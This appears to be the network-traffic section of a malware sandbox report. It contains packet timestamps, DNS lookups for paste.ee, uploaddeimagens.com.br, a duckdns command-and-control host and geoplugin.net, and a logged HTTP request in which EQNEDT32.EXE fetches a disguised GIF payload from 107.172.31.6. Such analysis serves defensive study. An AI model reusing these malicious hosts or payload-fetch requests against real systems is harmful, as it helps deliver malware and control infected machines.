                                                      May 1, 2024 14:55:45.282114029 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282119989 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.282130957 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282155037 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.282203913 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282219887 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282236099 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282243013 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.282252073 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282269955 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282274961 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.282285929 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282301903 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282314062 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.282318115 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282335043 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282335997 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.282351971 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282368898 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.282373905 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.282407045 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442452908 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442481041 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442497969 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442514896 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442531109 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442533016 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442547083 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442559004 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442564964 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442586899 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442589998 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442606926 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442631006 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442670107 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442694902 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442708969 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442712069 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442728043 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442748070 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442760944 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442778111 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442794085 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442801952 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442811012 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442827940 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442837000 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442843914 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442861080 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442867041 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442878008 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442894936 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442902088 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442934990 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.442943096 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.442960024 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443000078 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443078041 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443120956 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443145037 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443191051 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443213940 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443231106 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443250895 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443268061 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443284988 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443290949 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443305016 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443326950 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443350077 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443382978 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443384886 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443401098 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443444967 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443448067 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443464041 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443480015 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443501949 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443536043 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443552017 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443568945 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443578959 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443588018 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443609953 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443628073 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443644047 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443661928 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443670034 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443703890 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443703890 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443721056 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443737030 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443753958 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443761110 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.443769932 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.443795919 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.603817940 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.603847980 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.603868008 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.603883982 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.603900909 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.603919983 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.603935957 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.603940964 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.603940964 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.603960991 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.603972912 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.603979111 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.603995085 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604011059 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604011059 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604027987 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604039907 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604057074 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604070902 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604085922 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604089022 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604115009 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604126930 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604130983 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604146957 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604165077 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604180098 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604182005 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604199886 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604239941 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604257107 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604280949 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604284048 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604296923 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604312897 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604322910 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604330063 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604346037 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604362011 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604373932 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604373932 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604377985 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604393959 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604408979 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604418039 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604425907 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604440928 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604451895 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604459047 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604481936 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604556084 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604573011 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604589939 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604610920 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604614973 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604633093 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604649067 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604654074 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604665041 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604671001 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604681969 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604697943 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604712963 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.604713917 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.604727030 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769592047 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769608974 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769610882 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769624949 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769642115 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769646883 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769659042 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769675016 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769681931 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769690990 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769709110 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769714117 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769726038 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769737959 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769742012 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769757986 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769773960 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769777060 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769793987 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769809961 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769810915 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769826889 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769843102 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769845009 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769859076 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769875050 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769882917 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769892931 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769918919 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769922018 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769937992 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769956112 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769963026 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769970894 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.769987106 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.769988060 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770004034 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770020008 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770021915 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770039082 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770055056 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770056009 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770073891 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770092010 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770103931 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770106077 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770112991 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770116091 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770123005 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770129919 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770138979 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770142078 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770153046 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770159006 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770164013 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770174980 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770178080 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770194054 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770210981 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770216942 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770226955 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770243883 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770250082 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770260096 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770276070 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770276070 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770294905 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770311117 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770313025 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770330906 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770345926 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770348072 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770365000 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770381927 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.770384073 CEST8049169107.172.31.6192.168.2.22
                                                      May 1, 2024 14:55:45.770418882 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:45.873192072 CEST4916980192.168.2.22107.172.31.6
                                                      May 1, 2024 14:55:46.041716099 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:46.375164032 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:55:46.375245094 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:46.400890112 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:46.722963095 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:55:46.986597061 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:47.324479103 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:55:47.594975948 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:47.860188007 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:48.241621017 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:55:48.241677999 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:48.616255999 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:55:48.616323948 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:48.987668991 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:55:49.007334948 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:55:49.021266937 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:49.334170103 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:55:49.533978939 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:49.815313101 CEST4917180192.168.2.22178.237.33.50
                                                      May 1, 2024 14:55:49.996253967 CEST8049171178.237.33.50192.168.2.22
                                                      May 1, 2024 14:55:49.996328115 CEST4917180192.168.2.22178.237.33.50
                                                      May 1, 2024 14:55:49.996597052 CEST4917180192.168.2.22178.237.33.50
                                                      May 1, 2024 14:55:50.180807114 CEST8049171178.237.33.50192.168.2.22
                                                      May 1, 2024 14:55:50.180864096 CEST4917180192.168.2.22178.237.33.50
                                                      May 1, 2024 14:55:50.187923908 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:55:50.568121910 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:55:51.185129881 CEST8049171178.237.33.50192.168.2.22
                                                      May 1, 2024 14:55:51.185189962 CEST4917180192.168.2.22178.237.33.50
                                                      May 1, 2024 14:56:06.987246990 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:56:06.989058971 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:56:07.356241941 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:56:37.042191029 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:56:37.046777964 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:56:37.414513111 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:57:07.088273048 CEST1464549170194.187.251.115192.168.2.22
                                                      May 1, 2024 14:57:07.342459917 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:57:07.826029062 CEST4917014645192.168.2.22194.187.251.115
                                                      May 1, 2024 14:57:08.190840960 CEST1464549170194.187.251.115192.168.2.22
Timestamp | Source Port | Dest Port | Source IP | Dest IP
May 1, 2024 14:55:23.981447935 CEST | 65510 | 53 | 192.168.2.22 | 8.8.8.8
May 1, 2024 14:55:24.082490921 CEST | 53 | 65510 | 8.8.8.8 | 192.168.2.22
May 1, 2024 14:55:26.557622910 CEST | 62672 | 53 | 192.168.2.22 | 8.8.8.8
May 1, 2024 14:55:26.660554886 CEST | 53 | 62672 | 8.8.8.8 | 192.168.2.22
May 1, 2024 14:55:45.925879002 CEST | 56475 | 53 | 192.168.2.22 | 8.8.8.8
May 1, 2024 14:55:46.038903952 CEST | 53 | 56475 | 8.8.8.8 | 192.168.2.22
May 1, 2024 14:55:49.521001101 CEST | 49384 | 53 | 192.168.2.22 | 8.8.8.8
May 1, 2024 14:55:49.618367910 CEST | 53 | 49384 | 8.8.8.8 | 192.168.2.22
May 1, 2024 14:55:49.618632078 CEST | 49384 | 53 | 192.168.2.22 | 8.8.8.8
May 1, 2024 14:55:49.716569901 CEST | 53 | 49384 | 8.8.8.8 | 192.168.2.22
May 1, 2024 14:55:49.716793060 CEST | 49384 | 53 | 192.168.2.22 | 8.8.8.8
May 1, 2024 14:55:49.811661959 CEST | 53 | 49384 | 8.8.8.8 | 192.168.2.22
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
May 1, 2024 14:55:23.981447935 CEST | 192.168.2.22 | 8.8.8.8 | 0x2891 | Standard query (0) | paste.ee | A (IP address) | IN (0x0001) | false
May 1, 2024 14:55:26.557622910 CEST | 192.168.2.22 | 8.8.8.8 | 0x9c25 | Standard query (0) | uploaddeimagens.com.br | A (IP address) | IN (0x0001) | false
May 1, 2024 14:55:45.925879002 CEST | 192.168.2.22 | 8.8.8.8 | 0x8fae | Standard query (0) | sembe.duckdns.org | A (IP address) | IN (0x0001) | false
May 1, 2024 14:55:49.521001101 CEST | 192.168.2.22 | 8.8.8.8 | 0x324a | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
May 1, 2024 14:55:49.618632078 CEST | 192.168.2.22 | 8.8.8.8 | 0x324a | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
May 1, 2024 14:55:49.716793060 CEST | 192.168.2.22 | 8.8.8.8 | 0x324a | Standard query (0) | geoplugin.net | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
May 1, 2024 14:55:24.082490921 CEST | 8.8.8.8 | 192.168.2.22 | 0x2891 | No error (0) | paste.ee | | 104.21.84.67 | A (IP address) | IN (0x0001) | false
May 1, 2024 14:55:24.082490921 CEST | 8.8.8.8 | 192.168.2.22 | 0x2891 | No error (0) | paste.ee | | 172.67.187.200 | A (IP address) | IN (0x0001) | false
May 1, 2024 14:55:26.660554886 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c25 | No error (0) | uploaddeimagens.com.br | | 172.67.215.45 | A (IP address) | IN (0x0001) | false
May 1, 2024 14:55:26.660554886 CEST | 8.8.8.8 | 192.168.2.22 | 0x9c25 | No error (0) | uploaddeimagens.com.br | | 104.21.45.138 | A (IP address) | IN (0x0001) | false
May 1, 2024 14:55:46.038903952 CEST | 8.8.8.8 | 192.168.2.22 | 0x8fae | No error (0) | sembe.duckdns.org | | 194.187.251.115 | A (IP address) | IN (0x0001) | false
May 1, 2024 14:55:49.618367910 CEST | 8.8.8.8 | 192.168.2.22 | 0x324a | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
May 1, 2024 14:55:49.716569901 CEST | 8.8.8.8 | 192.168.2.22 | 0x324a | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
May 1, 2024 14:55:49.811661959 CEST | 8.8.8.8 | 192.168.2.22 | 0x324a | No error (0) | geoplugin.net | | 178.237.33.50 | A (IP address) | IN (0x0001) | false
                                                      • paste.ee
                                                      • uploaddeimagens.com.br
                                                      • 107.172.31.6
                                                      • geoplugin.net
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.22 | 49165 | 107.172.31.6 | 80 | 152 | C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
Timestamp | Bytes transferred | Direction | Data
May 1, 2024 14:55:03.500185013 CEST | 329 | OUT | GET /28088/indexphppagenotfound.gif HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
Host: 107.172.31.6
Connection: Keep-Alive
May 1, 2024 14:55:03.656900883 CEST | 1289 | IN | HTTP/1.1 200 OK
Date: Wed, 01 May 2024 19:55:03 GMT
Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.0.30
Last-Modified: Wed, 01 May 2024 07:25:00 GMT
ETag: "f522-6175f626093e7"
Accept-Ranges: bytes
Content-Length: 62754
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: image/gif
